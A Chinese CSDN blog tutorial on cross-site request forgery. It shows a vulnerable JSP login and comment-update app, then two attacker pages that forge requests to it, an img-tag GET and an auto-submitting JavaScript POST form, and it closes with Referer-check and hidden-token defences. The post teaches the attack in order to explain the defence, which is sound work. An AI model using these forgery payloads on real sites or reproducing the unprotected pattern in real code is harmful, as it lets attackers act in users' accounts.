web安全之跨站请求伪造

最新推荐文章于 2023-09-10 14:00:00 发布
最新推荐文章于 2023-09-10 14:00:00 发布
阅读量780 收藏
点赞数
分类专栏: web安全
CSRF(Cross-site request forgery),中文名称:跨站请求伪造.
因为这个不是用户真正想发出的请求,这就是所谓的请求伪造;因为这些请求也是可以从第三方网站提交的,所以前缀跨站二字。

CSRF发生的场景如下图所示:

用户登录访问了一个受信任的站点,
在用户还没有退出登录的时候,打开另外一个tab页,访问了网站B。
在B网站中,有CSRF攻击代码访问网站A。
发生的原因是,网站是通过cookie来识别用户的,当用户成功进行身份验证之后浏览器就会得到一个
标识其身份的cookie,只要不关闭浏览器或者退出登录,以后访问这个网站会带上这个cookie。
1.登录受信任网站A,并在本地生成Cookie。
2.在不登出A的情况下,访问危险网站B。
你也许会说:“如果我不满足以上两个条件中的一个,我就不会受到CSRF的攻击”。
是的,确实如此,但你不能保证以下情况不会发生:
1.你不能保证你登录了一个网站后,不再打开一个tab页面并访问另外的网站。
2.你不能保证你关闭浏览器了后,你本地的Cookie立刻过期,你上次的会话已经结束。
(事实上,关闭浏览器不能结束一个会话,但大多数人都会错误的认为关闭浏览器就等于
退出登录/结束会话了)如记住密码功能等。
3.上图中所谓的攻击网站,可能是一个存在其他漏洞的可信任的经常被人访问的网站。
下面来看一个代码实例,在网站A发布了下面的代码
用户login,然后可以在input.jsp提交数据,提交的数据被dataupdate.jsp更新到后台。
dataupdate.jsp会检查用户是否登录,如果没有登录会跳到login.jsp要求用户登录。

[html]  view plain copy 在CODE上查看代码片 派生到我的代码片
  1. login.jsp  
  2. <body>  
  3. <form action="input.jsp" method="post">  
  4. name<input type="text" name="name" size="50"><br>  
  5. pwd<input type="password" name="password" size="50"><br>  
  6. <input type="submit" value="submit">  
  7. </form>  
  8. <br>  
  9. </body>  
  10. </html>  
  11.   
  12. input.jsp  
  13. <body>  
  14. <%  
  15.     //Session session = request.getSession();  
  16.     String username = (String)session.getValue("username");  
  17.     System.out.println("username " + username);  
  18.     if(null==username){  
  19.         String uname = request.getParameter("name");  
  20.         session.putValue("username", uname);  
  21.     }  
  22.   
  23. %>  
  24. <form action="dataupdate.jsp" method="post">  
  25. <input type="text" name="comment" size="50"><br>  
  26. <input type="submit" value="submit">  
  27. </form>  
  28. <br>  
  29. </body>  
  30.   
  31. dataupdate.jsp  
  32. <body>  
  33. <%  
  34.     String username = (String)session.getValue("username");  
  35.     System.out.println("username " + username);  
  36.     if(null==username){  
  37.         System.out.println("has not logged in");  
  38.         response.sendRedirect("login.jsp");  
  39.     }else{  
  40.         String comment = request.getParameter("comment");  
  41.           
  42.         System.out.println("add a comment: " + comment);  
  43.               
  44.         out.write("comment is : " + comment);  
  45.     }  
  46. %>  
  47. </body>  
  48. </html>  
表面上看起来好像没有问题。
假设我们有另外一个网站B,它有一个网页文件如下
如果在用户登录访问网站A的同时访问了网站B,访问者在网站A的数据就会被假冒更新。
可以在后台看到有如下的输出:add a comment: fromcsrf

[html]  view plain copy 在CODE上查看代码片 派生到我的代码片
  1. <body>  
  2. use a img element to send a get request <br>  
  3. <img src="http://www.a.com/prjWebSec/csrf/dataupdate.jsp?comment=fromcsrf">  
  4. </body>  
  5. </html>  
这里网站A违反了HTTP规范,使用GET请求更新资源。那是不是用post请求就不会发生CSRF呢?
结果是同样会发生。可以通过构造javascript构造form提交,如下面的代码

[html]  view plain copy 在CODE上查看代码片 派生到我的代码片
  1. <body >  
  2. </body>  
  3.     <script type="text/javascript">  
  4.   
  5.         var frmdocument.getElementById("viframe");  
  6.         function sendcsrf()    
  7.         {    
  8.             var form1 = document.createElement("form");    
  9.             form1.id = "form1";    
  10.             form1.name = "form1";    
  11.             document.body.appendChild(form1);    
  12.           
  13.             var input = document.createElement("input");    
  14.             input.type = "text";    
  15.             input.name = "comment";    
  16.             input.value = "from csrf post";    
  17.           
  18.             form1.appendChild(input);    
  19.             form1.method = "POST";    
  20.             form1.action = "http://www.a.com/prjWebSec/csrf/dataupdate.jsp";    
  21.             form1.submit();    
  22.             document.body.removeChild(form1);    
  23.         }   
  24.         sendcsrf();  
  25.     </script>  
  26. </html>  
防止方法:
1,利用referer判断,
但是用户有可能设置浏览器使其在发送请求时不提供 Referer,这样的用户也将不能访问网站。
2,在请求中添加 token 并验证
关键在于在请求中放入黑客所不能伪造的信息,并且该信息不存在于 cookie 之中,

可以在服务器端生成一个随机码,然后放在form的hidden元素中,form提交的时候在服务器端检查。


转自:http://blog.csdn.net/kkdelta/article/details/17503947

dazhi_100
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
篡改referer_HTTP_REFERER的用法及伪造
weixin_29615645的博客
12-24 2092
引言在php中,可以使用$_SERVER[‘HTTP_REFERER’]来获取HTTP_REFERER信息,关于HTTP_REFERER,php文档中的描述如下:“引导用户代理到当前页的前一页的地址(如果存在)。由 user agent 设置决定。并不是所有的用户代理都会设置该项,有的还提供了修改HTTP_REFERER 的功能。简言之,该值并不可信。 ”在百度百科中,对于该参数的描述如下:“HT...
每日漏洞 | 请求伪造
03-12 821
HTTP的无状态性,导致Web应用程序必须使用会话机制来识别用户。一旦与Web点建立连接(访问、登录),用户通常会分配到一个Cookie,随后的请求,都会带上这个Cookie,这样Web点就很容易分辨请求来自哪个用户,该修改哪个用户的数据。如果从第三方发起对当前点的请求,该请求也会带上当前点的Cookie。正是这是这个缺陷,导致了CSRF的产生,利用这个漏洞可以劫持用户执行非意愿的操作。
【已解决】请求伪造
专注于Java领域开发 关注我 带你玩转Java
06-16 2020
解决请求伪造
HTTP_REFERER的用法及伪造
热门推荐
且行且吟
11-13 10万+
引言在php中,可以使用$_SERVER[‘HTTP_REFERER’]来获取HTTP_REFERER信息,关于HTTP_REFERER,php文档中的描述如下: “引导用户代理到当前页的前一页的地址(如果存在)。由 user agent 设置决定。并不是所有的用户代理都会设置该项,有的还提供了修改 HTTP_REFERER 的功能。简言之,该值并不可信。 ” 在百度百科中,对于该参数的描
CSRF(请求伪造)详细说明
02-26
Cross-SiteRequestForgery(CSRF),中文一般译作请求伪造。经常入选owasp漏洞列表Top10,在当前web漏洞排行中,与XSS和SQL注入并列前三。与前两者相比,CSRF相对来说受到的关注要小很多,但是危害却非常大。...
网络安全原理与应用:请求伪造CSRF简介.pptx
05-16
请求伪造CSRF简介 第7章 Web应用安全 目标 Objectives 要求 了解请求伪造CSRF的基本概念; 了解请求伪造CSRF的攻击原理; 请求伪造CSRF简介 一、请求伪造CSRF简介 请求伪造(Cross-site ...
论文研究-请求伪造(CSRF)攻击与防范技术研究 .pdf
08-23
请求伪造(CSRF)攻击与防范技术研究,刘雅楠,马兆丰,请求伪造(CSRF)攻击作为最严重的web漏洞威胁之一被列入了开放Web应用安全项目(OWASP)十大漏洞列表。该攻击具有很大隐蔽性和危
csrf请求伪造简单示例
10-18
一个简单的csrf请求伪造的示例,只有一个简单的表单提交功能.通过伪造表单提交,完成一个简单的钓鱼案例
window.open被拦截的解决方案
客官不爱喝酒的博客
06-25 1084
a标签跳转
【Web漏洞探索】请求伪造漏洞
kjcxmx的博客
07-08 2268
请求伪造Cross-site request forgery(也称为CSRF、XSRF)是一种Web安全漏洞,允许攻击者诱导用户执行他们不打算执行的操作。攻击者通过伪造用户的浏览器的请求,向访问一个用户自己曾经认证访问过的网发送出去,使目标网接收并误以为是用户的真实操作而去执行命令。它允许攻击者部分规避同源策略,该策略旨在防止不同网相互干扰。常用于盗取账号、转账、发送虚假消息等。攻击者利用网请求的验证漏洞而实现这样的攻击行为,网能够确认请求来源于用户的浏览器,却不能验证请求是否源于用户的真实
请求伪造(CSRF)总结和防御
bluemoon_0的博客
02-04 1904
请求伪造(CSRF)总结和防御
如何解决请求伪造
沉底的石头
11-21 3万+
IBM appscan扫描漏洞--请求伪造 appscan修订建议: 如果要避免 CSRF 攻击,每个请求都应该包含唯一标识,它是攻击者所无法猜测的参数。 建议的选项之一是添加取自会话 cookie  的会话标识,使它成为一个参数。服务器必须检查这个参数是否符合会话 cookie,若不符合,便废弃请求。 攻击者无法猜测这个参数的原因是应用于 cookie  的“同源策
request header中的host伪造
weixin_42299862的博客
06-18 6668
一、 request header 中host的作用 转载:https://www.xuebuyuan.com/491841.html 在早期的Http 1.0版中,Http 的request请求头中是不带host行的,在Http 1.0的加强版和Http 1.1中加入了host行。 如: GET / HTTP/1.1 Host: www.google.com.hk … 一个IP地址可以对应多个域名: 一台虚拟主机(服务器)只有一个ip,上面可以放成千上万个网。当对这些网请求到来时,服务器根据Host
请求伪造(CSRF)攻击原理及预防手段
m0_47905795的博客
06-02 4578
随机化Token(CSRF Token):Token是用于验证网请求者身份的一种机制,可以防止CSRF攻击。该Token会在每次访问页面时刷新,以确保每次请求都需要新的Token。例如,在web应用程序中,可以通过hidden field的方式将Token加入到表单中,提交时验Referer检查:在服务端校验请求头中的Referer字段,确保请求是来自合法的来源页面,常用于辅助Token机制的验证。
请求伪造
记录或发现工作问题,予以解决
04-15 4171
安全报告中会提示vue打包后的js文件,可以通过模拟请求头的文件进行发送请求,才从而变得不安全,为了防止这种事情发生,需要通过nginx的代理进行控制除了服务器的ip以及baidu的ip地址,其余的模拟请求地址不允许访问该js文件。
一文带你学习请求伪造(CSRF)
大河之犬的博客
11-12 1919
在web应用中,很多接口通过GET进行数据的请求和存储,如果未对来源进行校验,并且没有token保护,攻击者可以直接通过发送含有payload的链接进行诱导点击;最后,普通的参数如果也被加密或哈希,将会给数据分析工作带来很大的困扰,因为数据分析工作常常需要用到参数的明文。比如一个“论坛发帖”的操作,在正常情况下需要先登录到用户后台,或者访问有发帖功能的页面。但是验证码并非万能。正因为P3P头目前在网的应用中被广泛应用,因此在CSRF的防御中不能依赖于浏览器对第三方Cookie的拦截策略,不能心存侥幸。
请求伪造
最新发布
cgjil的博客
09-10 156
1.1。
请求伪造(CSRF)
jkzyx123的博客
07-14 911
目标网会误认为该请求是合法的用户行为,并执行相应的操作。恶意请求执行:受害者在浏览器中打开了恶意页面后,其中的自动执行的请求会被发送到购物网。由于浏览器会自动携带受害者的身份验证凭证,购物网会误以为这是合法的请求,并执行购买商品的操作。CSRF(Cross-Site Request Forgery)请求伪造是一种常见的网络安全攻击,它利用用户在已经登录的网上的身份验证信息来执行恶意操作。攻击者构造恶意页面:攻击者创建一个恶意网页,其中包含一个自动执行的请求,向购物网发送一个购买商品的请求
aweb.xml请求伪造过滤器
09-06
Web.xml请求伪造(CSRF)过滤器是通过在web.xml配置文件中设置过滤器,并在过滤器类中继承OncePerRequestFilter.java父类来实现的。在该过滤器中,可以对请求头等进行匹配和判断,如果不符合特定条件,则认为是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值